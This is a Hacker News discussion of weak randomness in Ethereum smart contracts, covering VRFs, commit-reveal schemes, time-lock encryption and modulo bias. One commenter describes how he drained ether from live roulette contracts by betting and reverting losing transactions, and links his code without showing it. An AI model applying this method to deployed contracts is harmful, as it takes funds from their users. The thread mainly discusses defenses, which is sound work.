Hacker News new | past | comments | ask | show | jobs | submit login
Predicting Random Numbers in Ethereum Smart Contracts (positive.com)
261 points by alexlash on Feb 2, 2018 | hide | past | favorite | 60 comments



If this sort of thing interests you, checkout Dfinity's random beacons - They use threshold cryptography (think of it as a type of "multisig") to solve the commit-reveal problem (where the last party to reveal their commitment can abandon, so they have an advantage).

They build on it to create a provable, deterministic source of randomness which can't be exploited in this same way.

Here's a video that goes into more detail: https://www.youtube.com/watch?v=xf1dql4Zoqw


There's a general class of crypto for solving this problem called a VRF. Algorand also has a very clever way to solve the randomness problem, including a method to foil an attacker that is even able to get lucky repeatedly.


Did you mean Verifiable Random Functions (VRFs)?


I did, thanks


Is this class implemented in Solidity?


> deterministic source of randomness

There is a manifest contradiction here created by this choice of words.


IIRC It is entirely deterministic, if all parties are in cahoots with each other and sharing their secrets. But, if they are not, then it is effectively a non-deterministic random.


A coin flip is deterministic if you know its initial conditions and environment with sufficient precision. Deterministic cryptographic primitives can similarly be viewed as random, from the perspective of an observer who doesn't know the relevant secrets.


> solve the commit-reveal problem (where the last party to reveal their commitment can abandon, so they have an advantage).

Don't you commit to the contract before any revelations are made?


Normally you have one user of the contract who invokes it, and somebody else mines/computes the results.

I think the trick here is that the user of the contract is also mining/computing the smartcontract at the same time, and thus knows the contract's results before it's published to the network.

If they are unhappy with how the contract unfolds (because of the random component), they just pretend as if it all never happened, neither the contract usage or the contract mining/computing never took place.


That is a really really interesting post. I always figured that these were only exploitable from a miner's point of view, but no! Creating a contract that will access the same randomness and THEN query the targeted contract will work, since they both happen in the same block hence the randomness will be the same.


Yeah, I used this trick to empty out a few tens of dollars worth of Ethereum from a few naively-coded roulette contracts that were sitting around with a little money left in them.

Say a contract exists in the blockchain that owns a little bit of ether and has code so that if you send it a certain amount of money, it does some magic to randomly determine whether to send you more money back. I found a few contracts like that. All I had to do was code a contract that would send money to the target contract, check its own balance (to see if it won some money from the target), and then abort the entire transaction if its own balance isn't greater than it started with. The code was really simple: https://gist.github.com/AgentME/d4cc6aa355900853b8ede3a84b10...

("Tens of dollars" was in present prices. I assume it was an even tinier amount of money when the creator or previous users put the money in. I think there's multiple interesting moral problems here: if you decide to ignore any "code is law" notions about Ethereum and call what I did as stealing, is the crime lessened by the fact that they thought it was worth even less when they put it into the contract? Also, who exactly did I steal from? The users who put the money into the contract believed they had gambled it away. Does it make a difference if they believed that money was going into an un-owned pot to be winnings for the next person? Do I count as a "winner", since I did claim it in a way it was coded to accept? ... Maybe a related problem: If someone doing some kind of art/performance statement purposefully hid money underground in a random place on public property unlocked, unmarked, and location unknown to themselves such that they thought no one else or even themselves could ever find it, and then I find it with x-ray goggles and take it, am I stealing?)


The questions of morality are largely orthogonal to questions whether surrounding institutions have strategies to address behavior considered 'problematic'.

In the overworld, we have institutions which continuously interpret, enforce, refine, and revise both the letter and the spirit of contracts and law.

Ethereum developers and VIPs have already shown that they'll use hard forks to steer the community towards their preferred direction, and individuals will have to decide which chain to pursue. Since your actions are small beans and unlikely to prompt the Ethereum decision makers to reverse these transactions, you and others can likely keep doing such things in the future, and those affected will have little choice but to accept it.


Ok, but their question was morality, not what will be enforced, so, I'm not sure why you are bringing up what will be enforced?


I think they are interestingly intertwined questions. If something happens that's egregiously morally out of bounds, then people will find or create ways to enforce against it. From the other angle, existing enforcement mechanisms will impose themselves as trying to define what moral is. In a way, besides the little selfish gains, I may be fatalistically trying to define "code is law" as moral because it is what I am presently capable of enforcing. Maybe I'm just talking myself in a circle; it's good fuel to ruminate on.


> If something happens that's egregiously morally out of bounds, then people will find or create ways to enforce against it.

I think you left out "and a lot of money is involved". Do you think there would have been an emergency hard fork if the DAO only had $100 in it? I sincerely doubt it.

> existing enforcement mechanisms will impose themselves as trying to define what moral is.

Morality and Law (code or not) are different things. You can't code morality - you can only encode the programmer's morality. (Which is not the same thing, because the programmer can change his/her mind.)


I guess it would be more responsible to report the bug to the contract author first. Perhaps they will let you take it as a reward, and you'll sleep better at night and won't have a moral dilemma ;-)

Seriously though, nice find. What would be a way to defend against this?


The main article mentions some defenses. Never immediately determine whether or not the user wins; the basic idea of a transaction that immediately within the block results in win or lose has to be thrown out the door. Instead, roulette-type contracts always must have the user pay in as one transaction, let the user at a later block check if they won, and then let the user withdraw any winnings in a separate transaction.

An easy and pretty good way to do this is to record the block number they make their deposit, and then have the question of whether they win or lose be calculated from the hash of the block some fixed N blocks after their deposit. There are certain attacks by miners that are possible to try to force a win, but the attacks require the miners to forfeit mining rewards for blocks they calculate where they lose, and unless N is small enough for an attacker to try to generate the whole chain of deposit-wait-then-withdraw blocks, or the entire network is working together, it's likely that a different miner will create a block first and interrupt any miner trying to bruteforce a winning block. So if the winnings are under the size of the block reward amount, there's basically zero danger, and the danger is tiny unless the winnings are ridiculous. ... I hadn't thought about how possible future proof-of-stake schemes affect this though. Those might be fatal to this strategy on second thought, since it might be easy for a staker to try out many block variations. I'm not too familiar with this detail of PoS schemes though.

Another common solution involves active oracles and commit-then-reveal schemes, but they generally require the oracle to be honest, or else the oracle could participate in the lottery and force its own win. There are common ways that oracles try to show their own good behavior, so people can notice if they cheat and stop depending on them. As long as it's more profitable for the oracle to continue operating than to cheat a roulette and then be shunned, things work out.


Thanks for the explanation. Good point about staking, assuming if the validator is chosen before, then they are certain to get the chance to order the transactions in their favour.

The article, as I understood, the caller predicts the outcome of the 'random' function first, and then calls if the result is favourable. It seems like yours is more efficient, as it relies on using revert() to undo all state changes, if the outcome was unfavourable, so no need to predict anything!


I originally considered making my contract predict the outcome of the 'random' function first, but I got lazy when I realized I could just check whether I won and revert the transaction afterward for the specific contracts I wanted to attack. It also meant that my win-forcer contract was more generic and could work against more naive roulette contracts. However, my strategy would not work against naive roulette contracts that immediately on deposit calculate whether you won, but don't tell you or let you get the money until later. (I didn't encounter any like that, but it's a possible flawed way someone might attempt to make their contract defend against attacks.) To attack those, you would need to do the article's strategy of predicting the 'random' outcome first before making the deposit (or have your win-forcer contract automatically check the random outcome for you, and only make the deposit if it knows you'll win).


It seems like commit-reveal is really the only thing that makes sense.


It's too bad it's not possible to store a secret in a contract (as far as I know). It would be interesting to store a private key that would be revealed only after a certain block number (let's say calculated to be 10 years in the future) as a sort of time capsule for files.


Considering that the entirety of the blockchain is public, its impossible to actually put secrets into a smart-contract. You have to make the data available to all nodes that are actually running the smart contract data.

An interesting approach to solving this is homomorphic encryption. This allows for alice to give Bob to encrypted numbers A and B. Bob can then compute an encrypted version of A + B using only the encrypted versions of A and B. This could be used by putting an encrypted secret on the blockchain, after which everyone can compute using that secret, but cannot see the actual outcome.

This still won't help with random number generation though, because it remains deterministic.


I think proposals such as MAST allow secret contracts, up until that part of the contract is executed (if it ever needs to be executed).

https://medium.com/novamining/mast-smart-contracts-on-bitcoi...


I don't see how HE helps, but I've heard of VRF (verifiable random functions) and I think there is something there to do.


The Dfinity team (https://dfinity.org) is using something like this to underly their blockchain implementation: they use threshold BLS signatures with groups of nodes to sign previous chain states and still be resilient against misbehavior and network intermittence. The signatures are random, but their correctness can be verified once they have been published.

To support our secure key storage work, we'll be bringing a random beacon built on similar core concepts to the Ethereum chain for Keep.


We are working on this, in a sense, with Keep (https://keep.network). The actual storage is done off-chain, with an interaction on-chain, by incentivized nodes. The idea is to also support (initially limited) secure computation, like allowing a Keep to store a private key that can be used to cryptographically sign data via smart contract.

Revealing the key, for dead-man-switch-type operations for example, is also a possibility.


You can imagine how this would work trivially with lawyers (acting as executors/trustees, as they often do).

Take your secret key, split it into N pieces, create M parity pieces, RAID-style, for redundancy, distribute to M+N lawyers with instructions to reveal in 10 years. Lawyers put them into safe-deposit boxes for the duration, reveal in 10 years.

A mildly eccentric person could even do this at scale: create a public/private keypair for every year for the next, say, century, publish the public keys, distribute the private key pieces with instructions to a wide range of lawyers. Members of the public can encrypt and publish data with the appropriate public key, assuming they trust the system.


Shamir's Secret Sharing (SSS)[1] is a technique for doing this.

SSS solves a harder problem than (my understanding of) RAID parity: that it requires not just k out of i pieces (your N and M+N) to assemble a secret, but also that no fewer than k pieces is sufficient, for arbitrary 0 < k < i.

These days, SSS is commonly recommended (I don't know whether it's also commonly used) for storing cryptocurrency wallet backups.

[1]: https://en.wikipedia.org/wiki/Shamir%27s_Secret_Sharing


You could with an oracle. Without an oracle I think this would be impossible. How will the chain know the key in 10 years but not Bob now?


Time-locks: https://www.gwern.net/Self-decrypting-files You can implement them trapdoor/proof-of-work style using squaring or hashing with a reward that can be claimed only by publicly revealing the secret. Eventually you will be able to use witness encryption so you can encrypt a secret to the property 'Bitcoin blockchain has reached 500 additional blocks' which can only be decrypted by providing the valid PoW-hashes of 500 blocks etc.


> Eventually you will be able to use witness encryption so you can encrypt a secret to the property 'Bitcoin blockchain has reached 500 additional blocks' which can only be decrypted by providing the valid PoW-hashes of 500 blocks etc.

How do you prevent abusing that by running it in a simulation in which the difficulty crashes?


The difficulty resets only every ~2 weeks of blocks, so tanking the difficulty still requires the investment of a vast amount of hash power in order to create a parallel chain.

Secondly, as I understand witness encryption, if you're able to encode the hash rules as the condition, it would be easy to throw in an additional condition like 'all hash difficulties (# of leading zeros) must be >= difficulty XYZ', and simply ban large difficulty reductions. Which works as long as Bitcoin remains popular and justifying high-difficulty blocks, and if it crashes, your timelock is no longer secure so you don't want it to open and to failsafe.


Would this still be possible if the consensus algorithm was changed to proof of stake?


I'm not sure. Maybe you could change the condition to 'n successive stake signatures' but you would also have to model the stake-selection procedure in it... A property over a hash is fairly simple, but rerunning the whole PoS, essentially, is probably going to blow the witness encryption out into astronomical sizes unless someone can think of clever tricks?


What's the point of using the network then?

Why not do everything more efficiently via the "oracle" server?


This is the question that applies to about 99% of Dapps (at least the one that don't simply exist to serve other Dapps) so far.


Yes, exactly -- how does having some sort of external intervention into the protocol make the protocol more robust?


You misunderstand.

If a smart contract relies on an external data source from a normal server (oracle), then why even take the risk of deploying the smart contract?

If you're using an oracle for a data source you might as well do everything on a normal database.


By minimizing the role of the oracle, instead of relying on one entity, you can rely on the market. Anybody could be the oracle, they'd put their reputation/offer/price on sale and the stakeholders would select one as they wish.

You're still trusting the selected oracle to behave honestly, but they will be operating in a very competitive market which hopefully would lead to better behaviour. They might cheat once, but it would be trivial to switch to a better oracle next time.



You might be able to do this by having an Oracle as the intermediary - e.g. you write an Oracle that will reveal a private key at a certain point in the future, and the smart contract will be "activated" by the Oracle response. Problem is, where do you run an Oracle reliably?


The only solution I can think of is evolving contracts that rewrite along the blockchain as they evolve, the most current write being the ~state of the "secret". Each evolving contract could, composing a variety of hashing functions, write frequently enough to the blockchain that it would be impossible to predict where it was going, but verify it along the way, historically. Call it an evolving hash function


You couldn't do that and have it evolve towards a predetermined value though (unless you make it predictable in a way that any viewer could also predict it).


Yes you can, you have a hash that is not public and only segments are revealed and verified along the chain. Revealing the whole secret no longer makes it secret


How would that work? Everything in the blockchain is public. You can't automatically have something be revealed in the blockchain; if that worked, what stops someone from simulating blocks being added to the blockchain and seeing what your contract does? Unless the decryption was somehow linked to the set of the proof-of-works involved, but I don't think anyone yet has an idea of how that could be done.

You could later publish a decryption key into the blockchain that the contract uses, but I don't think that's "automatic" in the sense the earlier posts were hoping for.


Right, you would need a secret that is never revealed on the blockchain itself, but you could verify that someone had it and posted hashes derived from it periodically on the blockchain.


Some sort of scheme using Shamir's Secret Sharing with a set of oracles, as long as it's not possible for the oracles to easily discover each other to collude to decrypt the secret on their own.


White-box cryptography. AFAIK, all attempted implementations got broken, but it's still an active research area.


There are no provably secure white box crypto implementations. It's actually debated within the community _if_ one can even exist.


Isn't Elasticsearch an extreme overkill for 3500 contracts?


Almost definitely, but it's probably the only real option to feed data to a rich filtering / display UI like Kibana, for easier exploration. Probably worth the effort if you know how to do it.


Well, let's ignore the reuse of the seeds, let's focus on generating random numbers in a range 0-N using a uniform random generator that gives numbers from 0-M where M >= N.

Code snippets shown use modulus (x % (N+1)) to accomplish that. This will result in the numbers not at all uniformly distributed.

Of course, the differences in probability aren't that huge but the contracts are mathematically not fair.

    import numpy as np
    n, m = 2, 20
    binc = np.bincount(np.random.randint(0, m, size=20000000) % (n+1))
    print 1.0*binc/sum(binc);
    [0.3501464 0.3497516 0.300102 ]
When we're generating 0-2, from 0-20, we get 0 and 1 more often than 2.


Relevant thread wrt rng in smartcontracts: https://news.ycombinator.com/item?id=16281347


What use cases are there for random numbers in smart contracts? From the article, it seems like gambling is the main use.


Suppose I wanted to create a "game" running on Etherium's global computer; perhaps one that allowed people to own and breed virtual cats. I might want a random component in my "breed" behavior.

Imagine I want to create a smart contract where tasks are created by customers and assigned randomly to "turks" who submit completed tasks and are paid (if the task is accepted). A random number might be one useful part of the task assignment process.

ANY program that would random numbers is a potential candidate.


It's pretty much the same use case as any standard code, smart contracts are just decentralised code after all.


Gambling is pretty much the only use for smart contracts in general.


Supposedly, this is a 51.96 billion market globally.

https://www.statista.com/statistics/270728/market-volume-of- online-gaming-worldwide/


Maybe by people coming into the industry. The established industry in general is far too risk averse to use smart contracts in their current state




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: